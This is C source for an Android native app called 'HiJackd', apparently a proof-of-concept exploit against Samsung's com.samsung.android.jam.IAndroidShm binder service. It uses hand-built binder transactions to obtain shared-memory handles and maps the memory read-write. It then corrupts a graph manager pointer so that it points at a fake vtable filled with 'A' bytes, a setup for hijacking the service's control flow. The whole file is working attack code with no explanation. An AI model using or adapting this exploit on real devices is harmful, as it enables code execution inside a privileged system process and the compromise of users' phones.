#include <jni.h>

#include <errno.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>

#include <linux/binder.h>

#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <sys/types.h>

#include <unistd.h>

#include <android_native_app_glue.h>

#include <android/log.h>

#define APP_NAME "HiJackd"

#define LOGE(...) __android_log_print(ANDROID_LOG_ERROR, APP_NAME, __VA_ARGS__)
#define LOGW(...) __android_log_print(ANDROID_LOG_WARNING, APP_NAME, __VA_ARGS__)
#define LOGI(...) __android_log_print(ANDROID_LOG_INFO, APP_NAME, __VA_ARGS__)
#define LOGD(...) __android_log_print(ANDROID_LOG_DEBUG, APP_NAME, __VA_ARGS__)
#define LOGV(...) __android_log_print(ANDROID_LOG_VERBOSE, APP_NAME, __VA_ARGS__)

struct binder {
  int    fd;

  void*  map;
  size_t map_len;
};

static struct binder binder_open() {
  struct binder b = { 0 };
  struct binder_version version = { 0 };

  b.fd = open("/dev/binder", O_RDWR | O_CLOEXEC);
  if (b.fd < 0) {
    abort();
  }

  if ((ioctl(b.fd, BINDER_VERSION, &version) < 0)
      || version.protocol_version != BINDER_CURRENT_PROTOCOL_VERSION) {
    abort();
  }

  b.map_len = 128 * 1024;
  b.map = mmap(NULL, 128 * 1024, PROT_READ, MAP_PRIVATE, b.fd, 0);
  if (b.map == MAP_FAILED) {
    abort();
  }

  return b;
}

static void binder_close(struct binder* b) {
  munmap(b->map, b->map_len);
  close(b->fd);
  memset(b, 0, sizeof(*b));
}

static int binder_write_read(const struct binder* b, uint8_t* write, size_t write_len, uint8_t* read, size_t* read_len) {
  int result = 0;
  struct binder_write_read wr = { 0 };

  wr.write_buffer = (unsigned long)write;
  wr.write_consumed = 0;
  wr.write_size = write_len;

  wr.read_buffer = (unsigned long)read;
  wr.read_consumed = 0;
  if (read_len) {
    wr.read_size = *read_len;
  }
  else {
    wr.read_size = 0;
  }

  result = ioctl(b->fd, BINDER_WRITE_READ, &wr);

  if (read_len) {
    *read_len = wr.read_consumed;
  }

  return result;
}

static int binder_read(struct binder* b, uint8_t* data, size_t* data_len) {
  return binder_write_read(b, NULL, 0, data, data_len);
}

static int binder_write(struct binder* b, uint8_t* data, size_t data_len) {
  return binder_write_read(b, data, data_len, NULL, NULL);
}

static int binder_write_call(struct binder* b, uint32_t handle, uint32_t code, uint8_t* data, size_t data_len, uint8_t* offsets, size_t offsets_len) {
  uint32_t write_buf[(sizeof(uint32_t) + sizeof(struct binder_transaction_data)) / sizeof(uint32_t)] = { 0 };
  struct binder_transaction_data* txn = (struct binder_transaction_data*)&write_buf[1];
    
  write_buf[0] = BC_TRANSACTION;
  txn->target.handle = handle;
  txn->code = code;
  txn->flags = TF_ACCEPT_FDS;
    
  txn->data.ptr.buffer = (binder_uintptr_t)data;
  txn->data_size = data_len;
  txn->data.ptr.offsets = (binder_uintptr_t)offsets;
  txn->offsets_size = offsets_len;

  return binder_write(b, (uint8_t*)write_buf, sizeof(write_buf));
}

static int binder_read_result(struct binder* b, uint8_t** data, size_t* data_len, uint8_t** offsets, size_t* offsets_len) {
  uint32_t read_buf[32];
  size_t read_len;
  int done = 0;
  
  *data = NULL;
  *data_len = 0;
  *offsets = NULL;
  *offsets_len = 0;
  
  while (!done) {
    read_len = sizeof(read_buf);
    binder_read(b, read_buf, &read_len);
    for (size_t i = 0; i < read_len; ++i) {
      switch (read_buf[i]) {
        case BR_NOOP: {
          } break;

        case BR_TRANSACTION_COMPLETE: {
          } break;

        case BR_REPLY: {
          struct binder_transaction_data* txn = (struct binder_transaction_data*)&read_buf[i + 1];
          *data = txn->data.ptr.buffer;
          *data_len = txn->data_size;
          if (txn->offsets_size) {
            *offsets = txn->data.ptr.offsets;
            *offsets_len = txn->offsets_size;
          }
          done = 1;
          } break;
        
        case BR_FAILED_REPLY: {
          LOGI("BR_FAILED_REPLY");
          done = 1;
          } break;

        case BR_DEAD_REPLY: {
          LOGI("BR_DEAD_REPLY");
          done = 1;
          } break;
      }
    }
  }
}

/*
-- sent --
data:
0000:  00 01 00 00 1a 00 00 00 61 00 6e 00 64 00 72 00  ........a.n.d.r.
0010:  6f 00 69 00 64 00 2e 00 6f 00 73 00 2e 00 49 00  o.i.d...o.s...I.
0020:  53 00 65 00 72 00 76 00 69 00 63 00 65 00 4d 00  S.e.r.v.i.c.e.M.
0030:  61 00 6e 00 61 00 67 00 65 00 72 00 00 00 58 58  a.n.a.g.e.r...XX
0040:  23 00 00 00 63 00 6f 00 6d 00 2e 00 73 00 61 00  ....c.o.m...s.a.
0050:  6d 00 73 00 75 00 6e 00 67 00 2e 00 61 00 6e 00  m.s.u.n.g...a.n.
0060:  64 00 72 00 6f 00 69 00 64 00 2e 00 6a 00 61 00  d.r.o.i.d...j.a.
0070:  6d 00 2e 00 49 00 41 00 6e 00 64 00 72 00 6f 00  m...I.A.n.d.r.o.
0080:  69 00 64 00 53 00 68 00 6d 00 00 00              i.d.S.h.m...

offsets:
0000:                                                   
*/

uint8_t data_0[] = {
  0x00, 0x01, 0x00, 0x00, 0x1a, 0x00, 0x00, 0x00, 0x61, 0x00, 0x6e, 0x00, 0x64, 0x00, 0x72, 0x00, 
  0x6f, 0x00, 0x69, 0x00, 0x64, 0x00, 0x2e, 0x00, 0x6f, 0x00, 0x73, 0x00, 0x2e, 0x00, 0x49, 0x00, 
  0x53, 0x00, 0x65, 0x00, 0x72, 0x00, 0x76, 0x00, 0x69, 0x00, 0x63, 0x00, 0x65, 0x00, 0x4d, 0x00, 
  0x61, 0x00, 0x6e, 0x00, 0x61, 0x00, 0x67, 0x00, 0x65, 0x00, 0x72, 0x00, 0x00, 0x00, 0x58, 0x58, 
  0x23, 0x00, 0x00, 0x00, 0x63, 0x00, 0x6f, 0x00, 0x6d, 0x00, 0x2e, 0x00, 0x73, 0x00, 0x61, 0x00, 
  0x6d, 0x00, 0x73, 0x00, 0x75, 0x00, 0x6e, 0x00, 0x67, 0x00, 0x2e, 0x00, 0x61, 0x00, 0x6e, 0x00, 
  0x64, 0x00, 0x72, 0x00, 0x6f, 0x00, 0x69, 0x00, 0x64, 0x00, 0x2e, 0x00, 0x6a, 0x00, 0x61, 0x00, 
  0x6d, 0x00, 0x2e, 0x00, 0x49, 0x00, 0x41, 0x00, 0x6e, 0x00, 0x64, 0x00, 0x72, 0x00, 0x6f, 0x00, 
  0x69, 0x00, 0x64, 0x00, 0x53, 0x00, 0x68, 0x00, 0x6d, 0x00, 0x00, 0x00,
};

/*
-- sent --
data:
0000:  00 01 00 00 23 00 00 00 63 00 6f 00 6d 00 2e 00  ........c.o.m...
0010:  73 00 61 00 6d 00 73 00 75 00 6e 00 67 00 2e 00  s.a.m.s.u.n.g...
0020:  61 00 6e 00 64 00 72 00 6f 00 69 00 64 00 2e 00  a.n.d.r.o.i.d...
0030:  6a 00 61 00 6d 00 2e 00 49 00 41 00 6e 00 64 00  j.a.m...I.A.n.d.
0040:  72 00 6f 00 69 00 64 00 53 00 68 00 6d 00 00 00  r.o.i.d.S.h.m...
0050:  00 00 00 00                                      ....

offsets:
0000:                                                   
*/

uint8_t data_1[] = {
  0x00, 0x01, 0x00, 0x00, 0x23, 0x00, 0x00, 0x00, 0x63, 0x00, 0x6f, 0x00, 0x6d, 0x00, 0x2e, 0x00, 
  0x73, 0x00, 0x61, 0x00, 0x6d, 0x00, 0x73, 0x00, 0x75, 0x00, 0x6e, 0x00, 0x67, 0x00, 0x2e, 0x00, 
  0x61, 0x00, 0x6e, 0x00, 0x64, 0x00, 0x72, 0x00, 0x6f, 0x00, 0x69, 0x00, 0x64, 0x00, 0x2e, 0x00, 
  0x6a, 0x00, 0x61, 0x00, 0x6d, 0x00, 0x2e, 0x00, 0x49, 0x00, 0x41, 0x00, 0x6e, 0x00, 0x64, 0x00, 
  0x72, 0x00, 0x6f, 0x00, 0x69, 0x00, 0x64, 0x00, 0x53, 0x00, 0x68, 0x00, 0x6d, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 
};

/*
-- sent --
data:
0000:  00 01 00 00 19 00 00 00 61 00 6e 00 64 00 72 00  ........a.n.d.r.
0010:  6f 00 69 00 64 00 2e 00 75 00 74 00 69 00 6c 00  o.i.d...u.t.i.l.
0020:  73 00 2e 00 49 00 4d 00 65 00 6d 00 6f 00 72 00  s...I.M.e.m.o.r.
0030:  79 00 48 00 65 00 61 00 70 00 00 00              y.H.e.a.p...

offsets:
0000:                                                   
*/

uint8_t data_2[] = {
  0x00, 0x01, 0x00, 0x00, 0x19, 0x00, 0x00, 0x00, 0x61, 0x00, 0x6e, 0x00, 0x64, 0x00, 0x72, 0x00, 
  0x6f, 0x00, 0x69, 0x00, 0x64, 0x00, 0x2e, 0x00, 0x75, 0x00, 0x74, 0x00, 0x69, 0x00, 0x6c, 0x00, 
  0x73, 0x00, 0x2e, 0x00, 0x49, 0x00, 0x4d, 0x00, 0x65, 0x00, 0x6d, 0x00, 0x6f, 0x00, 0x72, 0x00, 
  0x79, 0x00, 0x48, 0x00, 0x65, 0x00, 0x61, 0x00, 0x70, 0x00, 0x00, 0x00, 
};

void android_main(struct android_app* state) {
  app_dummy();

  uint32_t android_shm_handle = 0;
  uint32_t shm_handles[32] = { 0 };
  uint32_t shm_fds[32] = { 0 };
  size_t   shm_sizes[32] = { 0 };
  uint32_t shm_offsets[32] = { 0 };
  
  uint8_t* graph_manager_ptr = NULL;
  uint8_t* engine_control_ptr = NULL;
  uint32_t s_graph_manager_ptr = NULL;
  uint32_t s_engine_control_ptr = NULL;
  uint32_t s_fake_vtable_ptr = NULL;

  do {
    uint8_t* data_ptr;
    size_t   data_len;
    uint8_t* offsets_ptr;
    size_t   offsets_len;

    struct binder b = binder_open();

    binder_write_call(&b, 0, 1, data_0, sizeof(data_0), NULL, 0);
    binder_read_result(&b, &data_ptr, &data_len, &offsets_ptr, &offsets_len);
    if (data_len == 24 && offsets_len == 8) {
      android_shm_handle = *((uint32_t*)&data_ptr[8]);
      LOGI("android_shm_handle = %u", android_shm_handle);
    }
    else {
      abort();
    }

    for (uint32_t i = 0; i < 32; ++i) {
      *((uint32_t*)&data_1[sizeof(data_1) - 4]) = i;
      binder_write_call(&b, android_shm_handle, 1, data_1, sizeof(data_1), NULL, 0);
      binder_read_result(&b, &data_ptr, &data_len, &offsets_ptr, &offsets_len);
      if (data_len == 24 && offsets_len == 8) {
        shm_handles[i] = *((uint32_t*)&data_ptr[8]);
        LOGI("shm_handles[%u] = %u", i, shm_handles[i]); 
      }
    }

    for (uint32_t i = 0; i < 32; ++i) {
      if (!shm_handles[i]) continue;
      binder_write_call(&b, shm_handles[i], 1, data_2, sizeof(data_2), NULL, 0);
      binder_read_result(&b, &data_ptr, &data_len, &offsets_ptr, &offsets_len);
      if (data_len == 36 && offsets_len == 8) {
        shm_fds[i] = *((uint32_t*)&data_ptr[8]);
        shm_sizes[i] = *((size_t*)&data_ptr[24]);
        shm_offsets[i] = *((uint32_t*)&data_ptr[32]);
        LOGI("shm_fds[%u] = %u", i, shm_fds[i]);
        LOGI("shm_sizes[%u] = %u", i, shm_sizes[i]);
        LOGI("shm_offsets[%u] = %u", i, shm_offsets[i]);
        if (shm_sizes[i] > 73728) {
          graph_manager_ptr = mmap(NULL, shm_sizes[i], PROT_READ | PROT_WRITE, MAP_SHARED, shm_fds[i], shm_offsets[i]);
          LOGI("graph_manager_ptr = %p", graph_manager_ptr);
        }
        else if (shm_sizes[i] == 0x1000) {
          engine_control_ptr = mmap(NULL, shm_sizes[i], PROT_READ | PROT_WRITE, MAP_SHARED, shm_fds[i], shm_offsets[i]);
          LOGI("engine_control_ptr = %p", engine_control_ptr);
          break;
        }
      }
    }

    if (!graph_manager_ptr || !engine_control_ptr) {
      abort();
    }

    s_graph_manager_ptr = *((uint32_t*)&graph_manager_ptr[12]);
    s_engine_control_ptr = *((uint32_t*)&engine_control_ptr[12]);

    sleep(1);

    LOGI("s_graph_manager_ptr = %p", s_graph_manager_ptr);
    LOGI("s_engine_control_ptr = %p", s_engine_control_ptr);
    
    memset(&engine_control_ptr[0x800], 'A', 0x100);
    *((uint32_t*)graph_manager_ptr) = s_engine_control_ptr + 0x800;
    *((int32_t*)&engine_control_ptr[0x24c]) = -2;

    sleep(10);

  } while (0);
  
  LOGI("done");
  abort();
}
